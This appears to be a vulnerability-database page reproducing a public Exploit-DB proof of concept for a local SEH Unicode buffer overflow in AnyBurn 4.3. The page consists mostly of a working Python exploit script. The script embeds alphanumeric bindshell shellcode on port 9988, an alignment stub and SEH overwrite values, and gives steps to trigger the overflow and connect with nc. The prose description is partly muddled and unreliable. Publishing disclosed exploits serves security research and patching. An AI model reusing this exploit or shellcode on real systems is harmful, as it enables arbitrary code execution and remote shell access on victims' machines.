AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)

vendor:

AnyBurn

by:

Matteo Malvica

8.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: AnyBurn

Affected Version From: 4.3

Affected Version To: 4.3

Patch Exists: YES

Related CWE: N/A

CPE: a:anyburn:anyburn:4.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64 SP1

2018

AnyBurn 4.3 – Local Buffer Overflow (SEH Unicode)

AnyBurn 4.3 is vulnerable to a local buffer overflow vulnerability when a maliciously crafted file is opened. This vulnerability can be exploited by an attacker to execute arbitrary code in the context of the application. The vulnerability is due to a lack of proper validation of user-supplied data, which can result in a buffer overflow. The vulnerability exists in the 'Copy disk to Image' feature of AnyBurn 4.3. An attacker can exploit this vulnerability by crafting a malicious file and copying it to the clipboard. When the 'Copy disk to Image' feature is used, the malicious file is opened, resulting in a buffer overflow and arbitrary code execution.

Mitigation:

Upgrade to the latest version of AnyBurn 4.3 or later.

Source

Exploit-DB raw data:

#!/usr/bin/env python

# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit) 
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002

# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now' 
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'


# alphanumeric bindshell - port 9988, courtesy of b33f
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")


# total payload length 10000

align = (
"\x55"                      #push EBP - closer register to our shellcode, from where we are pivoting
"\x6e"                      #Venetian Padding
"\x58"                      #pop EAX
"\x6e"                      #Venetian Padding
"\x05\x22\x11"              #add eax,0x11002200  \
"\x6e"                      #Venetian Padding     |> +0xB00 
"\x2d\x17\x11"              #sub eax,0x11001700  /
"\x6e"                      #Venetian Padding
"\x50"                      #push EAX
"\x6e"                      #Venetian Padding
"\xC3")                     #RETN

nseh = "\x94\x94" 			# ANSI x94 translates to Unicode 201D
seh =  "\xb5\x4d" 			# 0x004d00b5 POP POP RET in AnyBurn.exe module

preamble = "\x58" * 47 + shellcode + "\x58" * (9197-47- len(shellcode)) + nseh + seh
unicode_nops = "\x58" * 200
exploit = preamble + align + unicode_nops + "\x58" * (10000 - len(preamble) - len(unicode_nops)-len(align))

try:
	f=open("exploit.txt","w")
	print "[+] Creating %s bytes lasagna payload.." %len(exploit)
	f.write(exploit)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"